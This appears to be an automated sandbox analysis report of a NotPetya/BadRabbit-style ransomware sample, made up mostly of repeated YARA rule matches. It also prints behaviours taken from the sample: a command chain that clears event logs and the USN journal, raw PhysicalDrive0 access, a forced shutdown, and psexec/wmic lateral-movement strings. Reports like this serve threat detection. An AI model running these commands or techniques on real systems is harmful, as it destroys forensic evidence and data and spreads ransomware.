            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
            Clears the windows event log
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E51BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree,1_2_02E51BA0

            Operating System Destruction

            barindex
            Contains functionality to access PhysicalDrive, possible boot sector overwrite
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E58CBF CreateFileA on filename \\.\PhysicalDrive01_2_02E58CBF

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: p2pWin.exe, type: SAMPLEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: p2pWin.exe, type: SAMPLEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: p2pWin.exe, type: SAMPLEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: p2pWin.exe, type: SAMPLEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: p2pWin.exe, type: SAMPLEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: p2pWin.exe, type: SAMPLEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.2.p2pWin.exe.4d890.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.1.p2pWin.exe.4c050.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.1.p2pWin.exe.4d890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 4.0.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
            Source: 0.0.p2pWin.exe.4c050.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2cf9840.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2e67860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.0.p2pWin.exe.4d890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2cfb080.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.2.p2pWin.exe.4c050.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 4.2.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: Process Memory Space: p2pWin.exe PID: 5320, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Performs an instant shutdown (NtRaiseHardError)
            Source: C:\Windows\SysWOW64\rundll32.exeHard error raised: shutdownJump to behavior
            Contains functionality to create processes via WMI
            Source: p2pWin.exe, 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -h "%ws:%ws"%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhostSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilegeC:\Windows\/c %wsComSpec\cmd.exewevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02dat %02d:%02d %wsshutdown.exe /r /f/RU "SYSTEM" dllhost.datntdll.dllNtRaiseHardError\\.\C:\\.\PhysicalDrive0255.255.255.255%u.%u.%u.%u%s \\%s -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 wbem\wmic.exe%s /node:"%ws" /user:"%ws" /password:"%ws" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "\\%s\admin$\\%ws\admin$\%wsmemstr_e9299c95-9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E55A7E1_2_02E55A7E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E5C6D01_2_02E5C6D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E522A21_2_02E522A2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E5AEAD1_2_02E5AEAD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E5A5CC1_2_02E5A5CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E5BF731_2_02E5BF73
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E905C784_2_00007FF72E905C78
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E59987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,1_2_02E59987
            Source: p2pWin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: p2pWin.exe, type: SAMPLEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: p2pWin.exe, type: SAMPLEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: p2pWin.exe, type: SAMPLEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: p2pWin.exe, type: SAMPLEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: p2pWin.exe, type: SAMPLEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: p2pWin.exe, type: SAMPLEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.p2pWin.exe.4d890.3.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.4c050.2.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.4d890.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
